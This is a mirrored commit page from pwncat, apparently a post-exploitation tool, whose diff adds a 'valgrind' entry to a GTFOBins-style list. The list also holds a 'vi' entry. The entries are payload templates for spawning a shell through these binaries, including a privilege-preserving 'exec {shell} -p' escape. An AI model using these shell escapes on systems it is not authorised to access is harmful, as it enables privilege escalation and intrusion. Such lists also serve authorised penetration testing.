mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 01:25:37 +01:00
Added valgrind as a GTFOBin
This commit is contained in:
parent
db37afa5ce
commit
3edac48c55
@ -867,12 +867,26 @@
|
|||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"valgrind": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-q", "{shell}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
|
||||||
|
"vi": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
|
||||||
|
// Include an extra newline to be sure to exit vim itself.
|
||||||
|
"exit": "exit\n\n"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"vim": [
|
"vim": [
|
||||||
|
Loading…
Reference in New Issue
Block a user